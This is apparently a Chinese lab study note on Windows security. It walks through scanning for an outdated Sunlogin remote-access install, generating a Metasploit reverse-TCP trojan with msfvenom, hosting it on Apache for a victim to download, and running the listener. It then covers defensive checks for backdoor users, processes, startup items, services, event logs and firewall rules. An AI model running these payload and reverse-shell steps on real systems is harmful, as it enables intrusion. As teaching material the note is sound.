上一篇讲了用户和用户组、权限、远程桌面连接、cmd免责声明本文仅用于网络安全合法技术学习所有实验均在个人自建虚拟机靶机环境中完成未对任何第三方系统进行未经授权的测试所有实验操作必须在自建靶场、官方授权测试环境内完成禁止触碰任何第三方生产环境与真实业务系统严禁将文中内容用于非法入侵他人系统违者需自行承担法律责任。我们了解到最高的权限的用户是system我们的系统面板看不到因为就是我们系统本身管理员用户:administrator管理员组的组长权限最低的用户guest用户组是去批量管理一些用户的管理员组administrators权限怎么去查看右击鼠标、点击属性、安全、点击添加、点击允许远程桌面连接一台电脑连接到另外一台电脑上面去长沙连接上海的电脑的IP需要是公网的IP如果是内网IP的话那就需要我们在同一网段上面用的是RDP协议默认开放的端口3389cmd命令提示窗口打开winr输入cmd或者win输入cmd点击回车也可以选择用管理员身份打开点击文件夹在上面的路径下输入cmd也可以调用命令提示窗口uac用户的更改控制的一个设置系统漏洞攻击手法命令提示窗口添加用户普通用户后门用户rdp远程登录站在攻击方的角度如果是我们自己的电脑中招了我们应该怎样去进行排查呢首先按win键点击计算机右击计算机点击管理打开本地用户和组点击用户查看有没有用户不是自己创建的如果不是的话我们可以进行点击鼠标右键要么删掉要么禁用掉点击属性即可禁用掉还可以查看注册表winr输入regedit点击第三个目录展开点击SAM进行查看右击鼠标赋予权限在安全里面设置用户组的权限根据需求给对应的对象添加权限winr输入cmd然后输入whoami查看当前用户输入net user 当前用户的名字在刚刚的安全框里面添加administrator点击检查确定再点击添加的用户赋予权限刷新一下names里面的都是用户的名字的信息系统漏洞如何去修复打补丁和升级goby扫描系统漏洞的工具扫描工具nmap扫描组件winpcapnpcap只要wires hark能够抓包就可以了就不需要下载这两个组件第三方应用不是Windows系统或者手机厂商自带的软件而是通过一些别的途径下载到计算机的是人写的代码就会有漏洞和bug攻击者一旦发现并利用的话就能变成可入侵的漏洞这里演示的小实验就是通过攻击者的视角去看一下向日葵低版本的一个漏洞在运行时会随机开放一个大于40000的端口攻击者刚好利用这样的一个特征去找到入侵的突破口第一步搭建环境首先要准备一个向日葵的低版本这样一个环境前提是要知道对方的IP地址能否ping得通对方的IP打开kalinmap -p 40000-65535 目标主机的IP地址就会得到几个大于40000的端口号去进行验证能在浏览器里面进去的就是能够进去的,在kaili里面输入sudo su,进行一个提升权限输入密码输入命令nmap -p 40000-65535 主机IP会显示一串端口号将所有端口号复制下来在桌面生成一个文档将所有端口号粘贴到文档里面后面的一坨可以进行删除在IP地址前面补充一个https://,每一个都粘贴批量在浏览器里面访问先添加一个工具打开浏览器点击浏览器右上角的三条横杠点击扩展与主题搜索一个pasty,回车添加一个组件固定到地址栏上面将文档里面的所有URL复制然后直接点击插件有回复的就是我们能够用向日葵低版本能够进去的端口就是可以通过向日葵低版本能够进去的端口。关于低版本漏洞我们应该如何去进行防御第三方漏洞程序漏洞如何去进行防御当然是升级了本质上是因为版本太低的原因我们升级就可以了还可以打补丁如果里面有木马要怎么办那我们要搞清楚这个木马程序是如何去执行的一个木马攻击流程的核心如何去控制我们的电脑的然后在通过相应的手段去进行应对例如装个360或者火绒。生成木马程序步骤①msfconsole #启动metasploit②# 生成反向连接木马 reverse-tcp目标机主动连接攻击机③msfvenom -p Windows/meterpreter/reverse-tcp LHOST本地主机也就是攻击者的主机 LPORT攻击者的端口 -f exe shell.exe④在自己的攻击者服务器里面去开一个服务这个服务是web服务首先开一个apache2的服务再把木马程序放在我的固定的文件夹里面然后让对方主动来下载我的这一个文件夹就好了在kali里面新开一个窗口⑤先mv shell.exe /var/www/html这是移动将我现在的exe程序移动到指定的目录当中移动的时候需要管理员身份所以我们需要提权就是提高权限sudo su再去启动刚刚讲的这个service apache2 start服务那么我们就能通过访问通过访问IP然后去写这个shell.exe的程序然后通过靶机去下载若能下载则说明服务器搭建成功靶机就可以下载木马了然后再在浏览器里面搜索kali的IP访问kali的主机主机下有一个shell.exe的程序回车现在已经对方主机有了这样一个木马程序先开一个监控器msfconsoleuse exploit/multi/handler # 加载监听模块set payload Windows/meterpreter / reverse_tcp #与木马payload一致设置攻击手段这个手段要与制作木马的手段一模一样set lhost 0.0.0.0#监听所有网卡set lport xxxx # 与木马lport一致run # 启动监听。⑥对于陌生的文件我们应该怎样去做先丢给杀毒软件或者在虚拟机里面运行或者在进程里面查看首先右击任务栏进入任务管理器点击进程可以去查看相关进程查看是否有陌生的进程可以直接禁用掉或者也可以找到文件位置进行排查或者在云沙箱里面进行分析有爆红报读的文件就可以结束进程然后就可以删掉该文件夹了也可以打开任务管理器打开性能右下角有一个打开资源监视器也可以在CPU下面有一个关联句柄里面可以搜索相关文件它会给我们一个相应的结果在这里去进行一个关闭结束进程即可一定要删掉该文件斩草除根不给后来留祸患。在桌面点击winr然后输入一个msinfo32里面有一个系统信息下面有一个软件环境软件环境下面有一个正在运行的任务这个比我们的任务管理器要更多一点在我们的任务管理器里边有一个右击查看文件所在位置在系统信息里面去做查看的时候然而msinfo32里面展示的信息更多这个是更加详细的能够去查看我们的进程的更加完整的一个路径这个会更加完全一点。如果用命令控制界面怎么去查看呢winr输入cmd回车过后输入netstat -ano查看外部的地址也可以查看我们的本地地址还能够去查看端口号可以看我的本地地址连接的是哪一个外部地址我本地地址的端口号连接的是外部地址的哪一个端口号可以去看一下有没有外面的地址就是一些陌生的IP和一些不常用的端口我们可以去放在微步社区里面去进行一个排查或者用一个云沙箱去进行一个分析。启动项自启动程序即开机自己启动不需要手动去进行启动计划任务定时去运行比如说我想要让某一个应用程序在某一个时刻运行我们就可以把该应用程序加到某个定时任务里面去如果我们把这个进程结束了他还会进行一个重启。我们排查的核心排查一下启动项和计划任务启动项排查的方法打开任务管理器上面有一个启动的选项卡里面显示的就是启动自启项如果不想让它自启动那么我们就可以将其禁用掉开机就不会再去自启动了开发者如果为空的话很大可能是木马程序。计划任务的排查方法在搜索栏里面搜索任务计划程序里面有一个计划任务程序库点击文件夹里面有一些陌生的触发器的话我们去进行停止和关闭就好了。还有一个排查叫做服务服务运行在后台的一些程序相当于我们的一个隐身的代表着我们看不到但是它是存在的有些服务它会伪装成一个系统的服务在我们的后台去偷偷的运行这种木马比启动项和计划任务更隐蔽因为他不可见但是他还存在所以我们就需要通过服务去进行一个排查我们看不到的服务我们就可以复制它的名称到我们的一个平台上去进行访问。{菱角社区}winr输入service.msc里面有运行的状态可以右击停止服务我们查看服务要怎同样去查看呢我们可以去借助工具或者是日志去进行查看去进行一一排查第三方工具PCHunter火绒和Windows自带的杀毒也都可以。日志是计算机的一个监控打开日志的方法点击win然后右击计算机点击管理 进去之后有一个事件查看器下面有一个windows日志点击安全筛选当前日志可以选择相应时间的日志有一个日志号4624叫做登录成功一般用户不会通过system的一个安全ID去进行登录既然已经登录成功了那我们就去看一下是否有前后门用户有没有创建木马4625的一个时间ID就是登陆失败如果有一坨4625的时间ID那只能说明我们的电脑遭受了远程爆破攻击如何去进行一个防护呢Windows都有一个Definer对于这个病毒的话我们可以去做一个扫描我们可以去下载一个火绒或者360去进行一个加固去做一个防护定期去做一个排查我们的电脑有没有问题也可以结合我们的电脑自带的windowsfier去进行查杀。防火墙在开始里面搜索防火墙点击高级设置会有入站出站的规则入站规则大于出站规则出站规则相当于我们自己出门入站规则相当于别人到我们家来我们也可以去设置一些入站规则添加一些新的规则可以新建一个程序去连接或者是点击某个窗口去做连接点击下一步去设置新的规则是一个TCP还是UDP和端口配置好想要的特定的一个入站规则ping命令就是在对方主机的入站规则有一个叫做ICMP回显的这一个让它没有通过导致对方没有如果对方电脑它的防火墙是一个开启的状态再去通过ping命令也是ping不通的因为防火墙开着的将入站规则给禁用掉则也可以ping得通电脑访问不到8080端口也是因为防火墙把这个给拦截了。端口和防火墙有关系我们通过防火墙我们需要去关闭一个40000以上的一个不常用的端口去限制一些陌生IP的访问减少攻击者扫描入侵的一个机会提高自己的安全防范措施和意识。